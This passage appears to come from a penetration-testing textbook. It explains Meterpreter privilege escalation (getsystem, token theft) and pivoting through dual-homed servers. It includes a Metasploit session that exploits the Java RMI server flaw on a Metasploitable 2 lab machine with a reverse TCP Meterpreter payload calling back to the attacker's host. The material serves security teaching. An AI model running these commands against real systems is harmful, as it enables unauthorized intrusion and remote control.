There are other ways to escalate your privileges. One way, if you have a Meterpreter
shell, is to use the built-in command
getsystem
. This command attempts different
strategies to escalate your privileges to those of SYSTEM. This access will get you
complete control of your target system. You are not guaranteed to get SYSTEM privi‐
leges by using
getsystem
. It depends on the access and permissions of the user you are
connected as. One technique is to grab a token and attempt to use that to get higher
permissions.
Pivoting to Other Networks
While desktop systems are commonly connected to a single network using just one
network interface, servers are often connected to multiple networks in order to iso‐
late traffic. You don’t, for instance, want your administrative traffic passing over the
front-side interface. The front-side interface is the one where external traffic comes
in, meaning it’s the interface that users use to connect to the service. If we isolate
administrative traffic to another interface for performance or security purposes, now
we have two interfaces and two networks. The administrative network is not going to
be directly accessible from the outside world, but it will typically have backend access
to many other systems that are also being administered.
We can use a compromised system to function as a router. One of the easiest ways to
do this is to use Meterpreter and run one of the modules available to help us. The first
thing we need to do is compromise a system with an exploit that allows a Meterpreter
payload. We’re going after the Metasploitable 2 system again, but the
distcc
exploit
doesn’t support the Meterpreter payload. Instead, we’re going to use a Java RMI server
vulnerability. RMI is functionality that lets one application call a method or function
on a remote system. This allows for distributed computing and for applications to use
services they may not directly support themselves.
Example 6-18
shows running the
exploit, including selecting the Java-based Meterpreter payload.
Example 6-18. Exploiting Java RMI server
msf > use exploit/multi/misc/java_rmi_server
msf exploit
(
multi/misc/java_rmi_server
)
>
set
RHOST 192.168.86.47
RHOST
=
> 192.168.86.47
msf exploit
(
multi/misc/java_rmi_server
)
>
set
PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD
=
> java/meterpreter/reverse_tcp
msf exploit
(
multi/misc/java_rmi_server
)
>
set
LHOST 192.168.86.30
LHOST
=
> 192.168.86.30
msf exploit
(
multi/misc/java_rmi_server
)
> exploit
[
*
]
Exploit running as background job 0.
[
*
]
Started reverse TCP handler on 192.168.86.30:4444
msf exploit
(
multi/misc/java_rmi_server
)
>
[
*
]
192.168.86.47:1099 - Using URL:
http://0.0.0.0:8080/wSlukgkQzlH3lj
[
*
]
192.168.86.47:1099 - Local IP: http://192.168.86.30:8080/wSlukgkQzlH3lj
